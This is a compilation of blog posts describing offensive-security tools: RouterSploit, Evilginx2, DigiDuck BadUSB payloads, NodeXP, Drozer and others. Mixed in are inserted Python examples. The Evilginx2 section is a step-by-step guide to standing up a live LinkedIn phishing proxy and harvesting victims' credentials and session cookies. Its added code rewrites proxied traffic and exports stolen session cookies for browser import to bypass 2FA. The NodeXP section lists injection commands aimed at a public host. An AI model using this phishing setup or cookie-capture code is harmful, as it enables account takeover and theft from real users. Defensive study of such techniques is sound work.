RouterSploit v3.4.0 – Exploitation Framework For Embedded Devices

The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. It consists of various modules that aid penetration testing operations:

- exploits – modules that take advantage of identified vulnerabilities
- creds – modules designed to test credentials against network services
- scanners – modules that check if a target is vulnerable to any exploit
- payloads – modules that are responsible for generating payloads for various architectures and injection points
- generic – modules that perform generic attacks

Installation

Requirements

Required: future, requests, paramiko, pysnmp, pycrypto
Optional: bluepy – Bluetooth Low Energy

Installation on Kali Linux

    apt-get install python3-pip
    git clone https://www.github.com/threat9/routersploit
    cd routersploit
    python3 -m pip install -r requirements.txt
    python3 rsf.py

Bluetooth Low Energy support:

    apt-get install libglib2.0-dev
    python3 -m pip install bluepy
    python3 rsf.py

Installation on Ubuntu 18.04 & 17.10

    sudo add-apt-repository universe
    sudo apt-get install git python3-pip
    git clone https://www.github.com/threat9/routersploit
    cd routersploit
    python3 -m pip install -r requirements.txt
    python3 rsf.py

Bluetooth Low Energy support:

    apt-get install libglib2.0-dev
    python3 -m pip install bluepy
    python3 rsf.py

Installation on OSX

    git clone https://www.github.com/threat9/routersploit
    cd routersploit
    sudo python3 -m pip install -r requirements.txt
    python3 rsf.py

Running on Docker

    git clone https://www.github.com/threat9/routersploit
    cd routersploit
    docker build -t routersploit .
    docker run -it --rm routersploit

Update

Update RouterSploit Framework often. The project is under heavy development and new modules are shipped almost every day.

    cd routersploit
    git pull

Download Routersploit

Link: http://www.kitploit.com/2018/10/routersploit-v340-exploitation.html

Evilginx v2.0 – Standalone Man-In-The-Middle Attack Framework Used For Phishing Login Credentials Along With Session Cookies, Allowing For The Bypass Of 2-Factor Authentication

evilginx2 is a man-in-the-middle attack framework used for phishing login credentials along with session cookies, which in turn allows bypassing 2-factor authentication protection.

This tool is a successor to Evilginx, released in 2017, which used a custom version of the nginx HTTP server to provide man-in-the-middle functionality and act as a proxy between a browser and the phished website. The present version is fully written in Go as a standalone application, which implements its own HTTP and DNS server, making it extremely easy to set up and use.

Disclaimer

This work is merely a demonstration of what adept attackers can do. It is the defender's responsibility to take such attacks into consideration and find ways to protect their users against this type of phishing attack. Evilginx should be used only in legitimate penetration testing assignments with written permission from the to-be-phished parties.

Video

See evilginx2 in action here: "Evilginx 2 – Next Generation of Phishing 2FA Tokens" from breakdev.org on Vimeo.

Write-up

If you want to learn more about this phishing technique, I've published an extensive blog post about evilginx2 here:
https://breakdev.org/evilginx-2-next-generation-of-phishing-2fa-tokens

Installation

You can either use a precompiled binary package for your architecture or you can compile evilginx2 from source.

You will need an external server where you'll host your evilginx2 installation. I personally recommend Digital Ocean and if you follow my referral link, you will get an extra $10 to spend on servers for free. Evilginx runs very well on the most basic Debian 8 VPS.

Installing from source

In order to compile from source, make sure you have installed Go of version at least 1.10.0 (get it from here) and that the $GOPATH environment variable is set up properly (default $HOME/go).

After installation, add this to your ~/.profile, assuming that you installed Go in /usr/local/go:

    export GOPATH=$HOME/go
    export PATH=$PATH:/usr/local/go/bin:$GOPATH/bin

Then load it with source ~/.profile.

Now you should be ready to install evilginx2. Follow these instructions:

    sudo apt-get install git make
    go get -u github.com/kgretzky/evilginx2
    cd $GOPATH/src/github.com/kgretzky/evilginx2
    make

You can now either run evilginx2 from the local directory like:

    sudo ./bin/evilginx -p ./phishlets/

or install it globally:

    sudo make install
    sudo evilginx

The instructions above can also be used to update evilginx2 to the latest version.

Installing with Docker

You can launch evilginx2 from within Docker. First build the container:

    docker build . -t evilginx2

Then you can run the container:

    docker run -it -p 53:53/udp -p 80:80 -p 443:443 evilginx2

Phishlets are loaded within the container at /app/phishlets, which can be mounted as a volume for configuration.

Installing from precompiled binary packages

Grab the package you want from here and drop it on your box. Then do:

    unzip <package_name>.zip -d <package_name>
    cd <package_name>

If you want to do a system-wide install, use the install script with root privileges:

    chmod 700 ./install.sh
    sudo ./install.sh
    sudo evilginx

or just launch evilginx2 from the current directory (you will also need root privileges):

    chmod 700 ./evilginx
    sudo ./evilginx

Usage

IMPORTANT! Make sure that there is no service listening on ports TCP 443, TCP 80 and UDP 53. You may need to shut down apache or nginx and any service used for resolving DNS that may be running. evilginx2 will tell you on launch if it fails to open a listening socket on any of these ports.

By default, evilginx2 will look for phishlets in the ./phishlets/ directory and later in /usr/share/evilginx/phishlets/. If you want to specify a custom path to load phishlets from, use the -p <phishlets_dir_path> parameter when launching the tool.

    Usage of ./evilginx:
      -debug
            Enable debug output
      -developer
            Enable developer mode (generates self-signed certificates for all hostnames)
      -p string
            Phishlets directory path

You should see the evilginx2 logo with a prompt to enter commands. Type help or help <command> if you want to see available commands or more detailed information on them.

Getting started

To get up and running, you need to first do some setting up.

At this point I assume you've already registered a domain (let's call it yourdomain.com) and you set up the nameservers (both ns1 and ns2) in your domain provider's admin panel to point to your server's IP (e.g. 10.0.0.1):

    ns1.yourdomain.com = 10.0.0.1
    ns2.yourdomain.com = 10.0.0.1

Set up your server's domain and IP using the following commands:

    config domain yourdomain.com
    config ip 10.0.0.1

Now you can set up the phishlet you want to use. For the sake of this short guide, we will use a LinkedIn phishlet. Set up the hostname for the phishlet (it must contain your domain, obviously):

    phishlets hostname linkedin my.phishing.hostname.yourdomain.com

And now you can enable the phishlet, which will initiate automatic retrieval of LetsEncrypt SSL/TLS certificates if none are locally found for the hostname you picked:

    phishlets enable linkedin

Your phishing site is now live. Think of the URL you want the victim to be redirected to on successful login and get the phishing URL like this (the victim will be redirected to https://www.google.com):

    phishlets get-url linkedin https://www.google.com

Running phishlets will only respond to tokenized links, so any scanners that scan your main domain will be redirected to the URL specified as redirect_url under config. If you want to hide your phishlet and make it not respond even to valid tokenized phishing URLs, use the phishlets hide/unhide <phishlet> command.

You can monitor captured credentials and session cookies with:

    sessions

To get detailed information about the captured session, with the session cookie itself (it will be printed in JSON format at the bottom), select its session ID:

    sessions <id>

The captured session cookie can be copied and imported into the Chrome browser using the EditThisCookie extension.

Important! If you want evilginx2 to continue running after you log out from your server, you should run it inside a screen session.

Download Evilginx2
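Why the captured cookie defeats the second factor is easiest to see in the proxy's rewrite step. The following Python is an added illustration written for this page, not evilginx2's code: for one upstream response it shows the two things a transparent phishing proxy has to do (rewrite Domain= on Set-Cookie, and hostnames in Location and the body, so the victim's browser keeps talking to the phishing host) and the one thing it gets for free (the real site's Set-Cookie values, which are only issued after the victim has completed login including the 2FA step). Hostnames, cookie names and values below are constructed; the LinkedIn phishlet mapping is assumed.

```python
import json
import re

# Hypothetical mapping for the LinkedIn phishlet from the guide above: the real
# hostname the upstream site uses -> the phishing hostname the victim talks to.
HOST_MAP = {"www.linkedin.com": "my.phishing.hostname.yourdomain.com"}


def rewrite_cookie_domain(set_cookie: str, host_map: dict) -> str:
    """Rewrite the Domain= attribute of a Set-Cookie header so the victim's
    browser scopes the cookie to the phishing host; all other attributes stay."""
    def repl(match):
        domain = match.group(2).lstrip(".")
        for real, phish in host_map.items():
            if real == domain or real.endswith("." + domain):
                return match.group(1) + phish
        return match.group(0)
    return re.sub(r"(;\s*[Dd]omain=)(\.?[A-Za-z0-9.-]+)", repl, set_cookie)


def rewrite_hosts(text: str, host_map: dict) -> str:
    """Replace real hostnames with phishing hostnames in redirects and bodies,
    so every follow-up request still passes through the proxy."""
    for real, phish in host_map.items():
        text = text.replace(real, phish)
    return text


def proxy_response(upstream_headers, body, host_map=HOST_MAP):
    """Rewrite one upstream response for the victim and record every cookie
    the real site set. Returns (headers_for_victim, body_for_victim, captured).

    Captured cookies keep their ORIGINAL values: once the victim has finished
    the login, second factor included, these are the authenticated session."""
    victim_headers, captured = [], {}
    for name, value in upstream_headers:
        lowered = name.lower()
        if lowered == "set-cookie":
            cookie_name, _, rest = value.partition("=")
            captured[cookie_name.strip()] = rest.split(";", 1)[0]
            value = rewrite_cookie_domain(value, host_map)
        elif lowered == "location":
            value = rewrite_hosts(value, host_map)
        victim_headers.append((name, value))
    return victim_headers, rewrite_hosts(body, host_map), captured


def session_export(captured: dict, real_host: str) -> str:
    """Serialise captured cookies as a JSON list of name/value/domain objects,
    scoped to the REAL host, the shape a cookie-import extension consumes."""
    return json.dumps(
        [{"name": n, "value": v, "domain": real_host} for n, v in sorted(captured.items())],
        indent=2,
    )


# Constructed upstream response, as the real site would send it after login.
UPSTREAM_HEADERS = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "sess=AQEDARabc123; Domain=.linkedin.com; Path=/; Secure; HttpOnly"),
    ("Location", "https://www.linkedin.com/feed/"),
]
UPSTREAM_BODY = '<a href="https://www.linkedin.com/login">Sign in</a>'

if __name__ == "__main__":
    headers, body, captured = proxy_response(UPSTREAM_HEADERS, UPSTREAM_BODY)
    for name, value in headers:
        print("%s: %s" % (name, value))
    print(body)
    print(session_export(captured, "www.linkedin.com"))
```

The exported values are the session the real site issued after it verified the second factor, which is why replaying them needs no further code. The defensive lesson is that nothing in this exchange tells the authenticator which origin it is serving: TOTP and push approvals pass straight through the proxy, whereas origin-bound methods such as FIDO2/WebAuthn security keys sign the phishing origin into the assertion, so the real site rejects it and the proxy has nothing usable to capture.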

Link: http://feedproxy.google.com/~r/PentestTools/~3/MZwD9sSUDgw/evilginx-v20-standalone-man-in-middle.html

Quasar – An Information Gathering Framework For Lazy Penetration Testers

Quasar is an information gathering framework for penetration testers, coded by Belahsan Ouerghi. Modules:

- Website information
- E-mail address checker
- Phone number information
- Credit card BIN checker
- IP locator
- Port scanner

Installation

    sudo apt-get install git
    git clone https://github.com/TunisianEagles/quasar.git
    cd quasar
    chmod +x install.sh
    chmod +x quasar.sh
    sudo ./install.sh
    sudo ./quasar.sh

Tested on: BackBox Linux, Ubuntu

Contact: Belahsan Ouerghi
YouTube: Tunisian Eagles YouTube channel

Download Quasar

Link: http://feedproxy.google.com/~r/PentestTools/~3/Fd3ymvOCDo0/quasar-information-gathering-framework.html

DigiDuck Framework – Framework For Digiduck Development Boards Running ATTiny85 Processors And Micronucleus Bootloader

Framework for Digiduck development boards running ATTiny85 processors and the micronucleus bootloader!

Roadmap:

- Plan to implement a command for Duckyspark translation within the framework.

Requirements:

- ATTiny85 or other compatible "Digispark" development board(s)
- DigiSpark drivers (if you can use it with Arduino you should be fine)
- OSX or macOS
- Arduino IDE with the Digispark library installed

Getting Started

Installation:

DigiDuck Framework (referred to as DDF) is really simple to start and set up! There are no third-party modules required for DDF! All you need to do is make sure you have Python 3.6+ (I used this to develop it but it should be backwards compatible *hopefully*). Clone this repository and enter the directory from the command line. Once inside the directory simply run:

    python start.py

This will start the program and display the welcome screen.

Help Menu:

There are three commands in this framework! I wanted to make this as lightweight as possible so it only requires one command in order to get a payload onto your board.

Command: help – displays the help menu.

Command: show – lists all your available payloads. The execute command displays the same list again.

Execution:

The third and last command in DDF is execute. The execute command will display the same menu as the show command, however from this menu you will input the payload name. You have to include .hex at the end of it or it won't load correctly and will ask you to enter it again.

Once you choose your payload you will be prompted to insert your desired board into the computer. From there it will install the desired payload and report when it has completed. That's it! You can now go plug your badUSB DigiSpark board into a computer and run the desired payload!

Payloads:

Payloads are DigiSpark .ino hex files that are installed using the micronucleus bootloader to your ATTiny85 or other boards.

Current Payloads:

All the current payloads are from Hak5's RubberDucky scripts available here. If you are unsure of what a payload may do this is the place to go read about it. I'll try to keep the payloads close to the same name but I don't want you on Windows to be typing out too much since rlcompleter doesn't work.

Creating a Payload:

Head to the Duckyspark GitHub page (https://github.com/toxydose/Duckyspark) to see how to create your translated .ino file from a RubberDucky script. After that load your .ino file into the Arduino IDE. Make sure Verbose is on inside Preferences and compile your code. Open the terminal output below and look for the .hex file location. It should be in a temp directory in your AppData or the equivalent on macOS, right above where it tells you to plug in your board.

Pull the payloadname.cpp.hex file from that folder and drag it into payloads inside the DDF framework. Run the program and your payload will be loaded into Available Payloads!

Feel free to contribute by adding custom or more payloads from the Rubber Ducky scripts above! Make a PR with the new payloads.

Credits:

- Duckyspark – https://github.com/toxydose/Duckyspark
- Micronucleus – https://github.com/micronucleus/micronucleus
- Hak5 RubberDucky Payloads – https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads

Download DigiDuck-Framework
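The roadmap item above is a DuckyScript-to-Digispark translation step inside the framework. As an added example written for this page (it is neither DDF's nor Duckyspark's code), here is a translator for a small DuckyScript subset that emits the Digispark sketch you would then compile in the Arduino IDE to obtain the .cpp.hex file for the payloads folder. The constant names KEY_A..KEY_Z, KEY_0..KEY_9, KEY_ENTER, KEY_SPACE and MOD_*_LEFT are assumed to come from the Digispark DigiKeyboard.h header; the sample payload is constructed. Commands outside the subset raise an error instead of being silently dropped.

```python
import re

# DuckyScript subset understood by this translator. The constants on the right
# are assumed to be provided by the Digispark DigiKeyboard.h header.
KEYS = {"ENTER": "KEY_ENTER", "SPACE": "KEY_SPACE"}
MODIFIERS = {
    "GUI": "MOD_GUI_LEFT", "WINDOWS": "MOD_GUI_LEFT",
    "CTRL": "MOD_CONTROL_LEFT", "CONTROL": "MOD_CONTROL_LEFT",
    "ALT": "MOD_ALT_LEFT", "SHIFT": "MOD_SHIFT_LEFT",
}

SKETCH_TEMPLATE = '''#include "DigiKeyboard.h"

void setup() {
  // A no-op keystroke first gives the host time to finish HID enumeration.
  DigiKeyboard.sendKeyStroke(0);
%s
}

void loop() {
  // The payload runs once from setup(); nothing to do here.
}
'''


def c_string(text: str) -> str:
    """Escape a STRING argument into a valid C string literal."""
    return '"' + text.replace("\\", "\\\\").replace('"', '\\"') + '"'


def key_constant(token: str) -> str:
    """Map a single key name to its DigiKeyboard constant."""
    upper = token.upper()
    if upper in KEYS:
        return KEYS[upper]
    if re.fullmatch(r"[A-Z0-9]", upper):
        return "KEY_" + upper
    raise ValueError("unsupported key: %r" % token)


def translate_line(line: str, previous: list) -> list:
    """Translate one DuckyScript line into a list of C statements."""
    line = line.strip()
    if not line:
        return []
    cmd, _, arg = line.partition(" ")
    cmd = cmd.upper()
    if cmd == "REM":
        return ["// " + arg]
    if cmd == "DELAY":
        return ["DigiKeyboard.delay(%d);" % int(arg)]
    if cmd == "STRING":
        return ["DigiKeyboard.print(%s);" % c_string(arg)]
    if cmd == "REPEAT":          # repeat the previous non-REM command n times
        return list(previous) * int(arg)
    if cmd in MODIFIERS:         # e.g. "GUI r" or "CTRL ALT t"
        mods, tokens = [MODIFIERS[cmd]], arg.split()
        while tokens and tokens[0].upper() in MODIFIERS:
            mods.append(MODIFIERS[tokens.pop(0).upper()])
        if len(tokens) != 1:
            raise ValueError("expected one key after modifiers: %r" % line)
        return ["DigiKeyboard.sendKeyStroke(%s, %s);"
                % (key_constant(tokens[0]), " | ".join(mods))]
    if cmd in KEYS:              # bare ENTER / SPACE
        return ["DigiKeyboard.sendKeyStroke(%s);" % KEYS[cmd]]
    raise ValueError("unsupported DuckyScript command: %r" % cmd)


def translate(script: str) -> str:
    """Translate a whole DuckyScript payload into a Digispark .ino sketch."""
    statements, previous = [], []
    for raw in script.splitlines():
        stmts = translate_line(raw, previous)
        cmd = raw.strip().split(" ", 1)[0].upper()
        if stmts and cmd not in ("REM", "REPEAT"):
            previous = stmts
        statements.extend(stmts)
    return SKETCH_TEMPLATE % "\n".join("  " + s for s in statements)


# Constructed sample payload: open the Windows Run dialog and start Notepad.
SAMPLE = """REM open the Run dialog and launch notepad
DELAY 1000
GUI r
DELAY 500
STRING notepad
ENTER
"""

if __name__ == "__main__":
    print(translate(SAMPLE))
```

Save the output as payloadname.ino, compile it with Verbose on as described above, and the payloadname.cpp.hex the IDE writes to its temp directory is what DDF's execute command flashes through micronucleus.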

Link: http://feedproxy.google.com/~r/PentestTools/~3/W2pYkIn97a4/digiduck-framework-framework-for.html

EKFiddle v.0.8.2 – A Framework Based On The Fiddler Web Debugger To Study Exploit Kits, Malvertising And Malicious Traffic In General

A framework based on the Fiddler web debugger to study exploit kits, malvertising and malicious traffic in general.

Installation

Download and install the latest version of Fiddler:
https://www.telerik.com/fiddler

Special instructions for Linux and Mac here:
https://www.telerik.com/blogs/fiddler-for-linux-beta-is-here
https://www.telerik.com/blogs/introducing-fiddler-for-os-x-beta-1

Enable C# scripting (Windows only)

Launch Fiddler, and go to Tools -> Options. In the Scripting tab, change the default (JScript.NET) to C#.

Change default text editor (optional)

In the same Tools -> Options menu, click on the Tools tab.

- Windows: notepad.exe or notepad++.exe
- Linux: gedit
- Mac: /Applications/TextEdit.app or /Applications/TextWrangler.app

Close Fiddler.

Download or clone CustomRules.cs into the appropriate folder based on your operating system:

- Windows (7/10): C:\Users\[username]\Documents\Fiddler2\Scripts\
- Ubuntu: /home/[username]/Fiddler2/Scripts/
- Mac: /Users/[username]/Fiddler2/Scripts/

Finish up the installation

Start Fiddler to complete the installation of EKFiddle. That's it, you're all set!

Features

Toolbar buttons

The added toolbar buttons give you quick shortcuts to some of the main features:

QuickSave
Dumps current web sessions into a SAZ named QuickSave-"MM-dd-yyyy-HH-mm-ss".saz in EKFiddle\Captures.

UI mode
Toggle between the default column view or extra columns with additional information (includes time stamp, server IP and type, method, etc.).

VPN
VPN GUI directly built into Fiddler. It uses the OpenVPN client on Windows and Linux with .ovpn files (signing up with a commercial VPN provider may be required). It will open up a new terminal/xterm whenever it connects to a new server via the selected .ovpn config file, killing the previous one to ensure only one TAP adapter is used at any given time.
- Windows: download and install OpenVPN in the default directory, then place your .ovpn files inside OpenVPN's config folder.
- Linux (tested on Ubuntu 16.04): sudo apt-get install openvpn, then place your .ovpn files in /etc/openvpn.

Proxy
Allows you to connect to an upstream proxy (HTTP/S or SOCKS).

Import SAZ/PCAP
A shortcut to load SAZ (Fiddler's native format) or PCAP (i.e. from Wireshark) captures.

View/Edit Regexes
View and create your custom regular expressions. Note: a master list is provided with auto-updates via GitHub. Additionally the custom list lets you create your own rules. There are 4 types of indicators to match on:

- URI (full or partial URI match)
- IP (single IP address or IP range)
- SourceCode (response body)
- Headers (any value within a response's headers)

Syntax (important! fields are TAB delimited):

    URI	My_URI_rule	[a-z0-9]{2}	Match URI
    IP	My_IP_address_rule	5\.154\.191\.67	Match static IP address
    IP	My_IP_address_rule	5\.154\.191\.(6[0-9]|70)	Match an IP range
    SourceCode	My_sourcecode_rule	vml=1	Look for specific string
    Headers	My_headers_rule	nginx	Look for specific string

Run Regexes
Run the master and custom regular expressions against current web sessions.

Clear Markings
Clear any comment and colour highlighting in the currently loaded sessions.

ContextAction menu

The ContextAction menu (accessed by right-clicking on any session(s)) allows you to perform additional commands on the selected sessions. This can be very helpful to do quick lookups, compute hashes or extract IOCs.

Hostname or IP address (Google Search, RiskIQ, URLQuery)
Query the hostname for the currently selected session.

URI
- Build Regex: create a regular expression from the currently selected URI. This action opens up a regex website and the URI is already in the clipboard, ready to be pasted into the query field.
- Open in… Internet Explorer, Chrome, Firefox, Edge: opens up the URI with the browser you selected.

Response Body
- Remove encoding: decodes the currently selected sessions (from their basic encoding).
- Build Regex: create a regular expression from the currently selected session's source code. This action opens up a regex website and the URI is already in the clipboard, ready to be pasted into the query field.
- Calculate MD5/SHA256 hash: gets the current session's body and computes its hash.
- Hybrid Analysis / VirusTotal lookup: checks the current session's body for its hash, then looks up that hash.
- Extract to Disk: downloads the currently selected session(s)' body to disk, into the 'Artifacts' folder.
- Extract IOCs: copies into memory basic information from the selected sessions so that they can be shared as IOCs.
- Extract Coinhive site keys

Connect-the-dots
Allows you to identify the sequence of events between sessions. Right-click on the session you are interested in retracing your steps to and simply 'connect the dots'. It will label the sequence of events from 01 to n within the comments column. You can reorder that column to have a condensed view of the sequence.

Crawler (experimental)
Load a list of URLs from a text file and let the browser automatically visit them: Tools -> Crawler (experimental) -> Start crawler. May require some tweaks in your browser's settings, in particular with regards to crash recovery.

Uninstalling EKFiddle

Delete CustomRules.cs

Download EKFiddle
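The rule syntax above is easiest to sanity-check by running it outside Fiddler. The following Python is an added example written for this page, not EKFiddle's CustomRules.cs: it parses the TAB-delimited rule lines from the syntax section (the trailing comment column is our assumption about the format) and runs them over constructed sessions the way Run Regexes does over Fiddler's session list. It goes slightly beyond the page in one respect: IP rules are matched against the whole address, so a range pattern cannot fire on a longer string that merely starts with a valid octet.

```python
import re

# Constructed rule list in EKFiddle's TAB-delimited syntax:
# TYPE<TAB>NAME<TAB>REGEX[<TAB>COMMENT]  (the comment column is an assumption).
RULES_TEXT = "\n".join([
    "URI\tMy_URI_rule\t[a-z0-9]{2}\tMatch URI",
    "IP\tMy_IP_address_rule\t5\\.154\\.191\\.67\tMatch static IP address",
    "IP\tMy_IP_range_rule\t5\\.154\\.191\\.(6[0-9]|70)\tMatch an IP range",
    "SourceCode\tMy_sourcecode_rule\tvml=1\tLook for specific string",
    "Headers\tMy_headers_rule\tnginx\tLook for specific string",
])

RULE_TYPES = ("URI", "IP", "SourceCode", "Headers")


def load_rules(text: str) -> list:
    """Parse rule lines into (type, name, compiled regex, comment) tuples.
    Blank lines and lines starting with '#' are skipped; a bad line is an error
    rather than a silently ignored rule."""
    rules = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split("\t")
        if len(fields) < 3:
            raise ValueError("line %d: expected TYPE<TAB>NAME<TAB>REGEX" % lineno)
        rtype, name, pattern = fields[:3]
        if rtype not in RULE_TYPES:
            raise ValueError("line %d: unknown rule type %r" % (lineno, rtype))
        comment = fields[3] if len(fields) > 3 else ""
        rules.append((rtype, name, re.compile(pattern), comment))
    return rules


def session_text(session: dict, rtype: str) -> str:
    """Pick the part of a captured session that a rule type is matched against."""
    if rtype == "URI":
        return session["uri"]
    if rtype == "IP":
        return session["ip"]
    if rtype == "SourceCode":
        return session["body"]
    # Headers: every response header as "Name: value", one per line
    return "\n".join("%s: %s" % kv for kv in session["headers"].items())


def run_rules(rules: list, sessions: list) -> list:
    """Return (session index, rule type, rule name) for every rule that fires."""
    hits = []
    for idx, session in enumerate(sessions):
        for rtype, name, regex, _comment in rules:
            text = session_text(session, rtype)
            # IP rules must cover the whole address: an unanchored search would
            # let 5\.154\.191\.(6[0-9]|70) fire on 5.154.191.700 as well.
            found = regex.fullmatch(text) if rtype == "IP" else regex.search(text)
            if found:
                hits.append((idx, rtype, name))
    return hits


# Constructed sessions standing in for Fiddler's captured traffic.
SESSIONS = [
    {"uri": "http://cdn.example.test/ad.js", "ip": "5.154.191.67",
     "headers": {"Server": "nginx", "Content-Type": "application/javascript"},
     "body": "var x=1;"},
    {"uri": "http://landing.example.test/", "ip": "5.154.191.65",
     "headers": {"Server": "Apache"},
     "body": "<html><script>vml=1;</script></html>"},
    {"uri": "http://clean.example.test/", "ip": "5.154.191.700",
     "headers": {}, "body": ""},
]

if __name__ == "__main__":
    for idx, rtype, name in run_rules(load_rules(RULES_TEXT), SESSIONS):
        print("session %d  %-10s %s" % (idx, rtype, name))
```

Running it also shows why the page's sample URI rule is only a syntax illustration: [a-z0-9]{2} fires on every session, including the clean one, so a real URI rule needs enough of the path or query structure to be specific.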

Link: http://feedproxy.google.com/~r/PentestTools/~3/gKB5SbwjRek/ekfiddle-v082-framework-based-on.html

HeapHopper – A Bounded Model Checking Framework For Heap-implementations

HeapHopper is a bounded model checking framework for heap implementations.

Setup

    sudo apt update && sudo apt install build-essential python-dev virtualenvwrapper
    git clone https://github.com/angr/heaphopper.git && cd ./heaphopper
    mkvirtualenv -ppython2 heaphopper
    pip install -e .

Required packages: build-essential python-dev virtualenvwrapper

Required Python packages: ana angr cle claripy IPython psutil pyelftools pyyaml

Examples

    # Gen zoo of permutations
    heaphopper.py gen -c analysis.yaml

    # Trace instance
    make -C tests
    heaphopper.py trace -c tests/how2heap_fastbin_dup/analysis.yaml -b tests/how2heap_fastbin_dup/fastbin_dup.bin

    # Gen PoC
    heaphopper.py poc -c tests/how2heap_fastbin_dup/analysis.yaml -r tests/how2heap_fastbin_dup/fastbin_dup.bin-result.yaml -d tests/how2heap_fastbin_dup/fastbin_dup.bin-desc.yaml -s tests/how2heap_fastbin_dup/fastbin_dup.c -b tests/how2heap_fastbin_dup/fastbin_dup.bin

    # Tests
    cd tests
    # Show source
    cat how2heap_fastbin_dup/fastbin_dup.c
    # Run tests
    ./run_tests.py
    # Show PoC source
    cat pocs/malloc_non_heap/fastbin_dup.bin/poc_0_0.c
    # Run PoC
    ./run_poc.sh pocs/malloc_non_heap/fastbin_dup.bin/bin/poc_0_0.bin

Publication

This work has been published at the 27th USENIX Security Symposium. You can read the paper here.

Cite:

    @inproceedings{heaphopper,
      author = {Eckert, Moritz and Bianchi, Antonio and Wang, Ruoyu and Shoshitaishvili, Yan and Kruegel, Christopher and Vigna, Giovanni},
      title = {HeapHopper: Bringing Bounded Model Checking to Heap Implementation Security},
      booktitle = {27th {USENIX} Security Symposium ({USENIX} Security 18)},
      year = {2018},
      address = {Baltimore, MD},
      url = {https://www.usenix.org/conference/usenixsecurity18/presentation/eckert},
      publisher = {{USENIX} Association},
    }

Download Heaphopper

Link: http://feedproxy.google.com/~r/PentestTools/~3/8qtoF85AbYg/heaphopper-bounded-model-checking.html

DarkSpiritz – A Penetration Testing Framework For UNIX Systems

What is DarkSpiritz?

Created by the SecTel Team, it was a project of one of the owners to update and clean up an older pentesting framework he had created into something updated and modern. DarkSpiritz is a revamp of the very popular framework known as "Roxysploit". You may be familiar with this framework and if you are then it will help you with DarkSpiritz. DarkSpiritz also works like another pentesting framework known as Metasploit. If you know how to use Metasploit, setting up and working with DarkSpiritz will be a breeze. Inside the program itself you will find a lot of help and documentation on plugins, or you can head to our wiki here. If you need any help feel free to contact us at sectel.team@protonmail.com.

Getting Started

Clone the repository with git:

    git clone https://github.com/DarkSpiritz/DarkSpiritz.git

DarkSpiritz wiki available here.

To install DarkSpiritz, clone the GitHub repo and run:

    sudo python installer.py

This will download all necessary modules for DarkSpiritz. Once you run this you will be able to run:

    python main.py

from within the same directory as DarkSpiritz.

You will see a start-up screen. This screen will display things like commands and configuration settings. You can set configuration settings inside the config.xml file itself or through commands in the DarkSpiritz shell.

Features:

These are features that the DarkSpiritz Team prides itself on:

- Real-time updating of configuration: never a need to restart the program, even when adding plugins or editing them.
- Easy to use UX
- Multi-functionality

Download DarkSpiritz

Link: http://feedproxy.google.com/~r/PentestTools/~3/b4RKOuo6W4s/darkspiritz-penetration-testing.html

NodeXP – Detection and Exploitation Tool for Node.js Services

NodeXP is an integrated tool, written in Python 2.7, capable of detecting possible vulnerabilities on Node.js services as well as exploiting them in an automated way, based on S(erver)S(ide)J(avascript)I(njection) attacks.

Getting Started – Installation & Usage

Download NodeXP by cloning the Git repository:

    git clone https://github.com/esmog/nodexp

To get a list of all options run:

    python2.7 nodexp.py -h

Examples for POST and GET cases accordingly:

    python2.7 nodexp.py --url="http://nodegoat.herokuapp.com/contributions" --pdata="preTax=[INJECT_HERE]" -c="connect.sid=s:i6fKU7kSLPX1l00WkOxDmEfncptcZP1v.fy9whjYW0fGAvbavzYSBz1C2ZhheDuQ1SU5qpgVzbTA"
    python2.7 nodexp.py --url="http://nodegoat.herokuapp.com/contributions" --pdata="preTax=[INJECT_HERE]" -c="connect.sid=s:i6fKU7kSLPX1l00WkOxDmEfncptcZP1v.fy9whjYW0fGAvbavzYSBz1C2ZhheDuQ1SU5qpgVzbTA" --tech=blind
    python2.7 nodexp.py --url="http://192.168.64.30/?name=[INJECT_HERE]" -c="connect.sid=s:i6fKU7kSLPX1l00WkOxDmEfncptcZP1v.fy9whjYW0fGAvbavzYSBz1C2ZhheDuQ1SU5qpgVzbTA"
    python2.7 nodexp.py --url="http://192.168.64.30/?name=[INJECT_HERE]" -c="connect.sid=s:i6fKU7kSLPX1l00WkOxDmEfncptcZP1v.fy9whjYW0fGAvbavzYSBz1C2ZhheDuQ1SU5qpgVzbTA" --tech=blind

Disclaimer

The tool's purpose is strictly academic and it was developed in order to conduct my master's thesis. It could also be helpful during the process of a penetration test on Node.js services. Any other malicious or illegal usage of the tool is strongly discouraged and is clearly not part of the purpose of this research.

Prerequisites

- Python 2.7
- Metasploit Framework
- msfvenom
- Kali Linux (or any other Linux distro with Metasploit Framework installed)

NodeXP Testbeds

- Download and run the Node.js files for both GET and POST cases from here
- Visit Nodegoat or install Nodegoat on your local machine!

Built With: Python 2.7

Versioning: NodeXP – Version 1.0.0

Authors: Dimitris Antonaropoulos – esmog

Download NodeXP

Link: http://feedproxy.google.com/~r/PentestTools/~3/OIgb6RZFu0o/nodexp-detection-and-exploitation-tool.html

Drozer v2.4.4 – The Leading Security Assessment Framework For Android

drozer (formerly Mercury) is the leading security testing framework for Android.

drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.

drozer provides tools to help you use, share and understand public Android exploits. It helps you to deploy a drozer Agent to a device through exploitation or social engineering. Using weasel (MWR's advanced exploitation payload) drozer is able to maximise the permissions available to it by installing a full agent, injecting a limited agent into a running process, or connecting a reverse shell to act as a Remote Access Tool (RAT).

drozer is open source software, maintained by MWR InfoSecurity, and can be downloaded from: mwr.to/drozer

Prerequisites

- Python 2.7. Note: On Windows please ensure that the path to the Python installation and the Scripts folder under the Python installation are added to the PATH environment variable.
- Protobuf 2.6 or greater
- Pyopenssl 16.2 or greater
- Twisted 10.2 or greater
- Java Development Kit 1.7. Note: On Windows please ensure that the path to javac.exe is added to the PATH environment variable.
- Android Debug Bridge

Installing

Building Python wheel

    git clone https://github.com/mwrlabs/drozer/
    cd drozer
    python setup.py bdist_wheel

Installing Python wheel

    sudo pip install drozer-2.x.x-py2-none-any.whl

Building for Debian/Ubuntu/Mint

    git clone https://github.com/mwrlabs/drozer/
    cd drozer
    make deb

Installing .deb (Debian/Ubuntu/Mint)

    sudo dpkg -i drozer-2.x.x.deb

Building for Redhat/Fedora/CentOS

    git clone https://github.com/mwrlabs/drozer/
    cd drozer
    make rpm

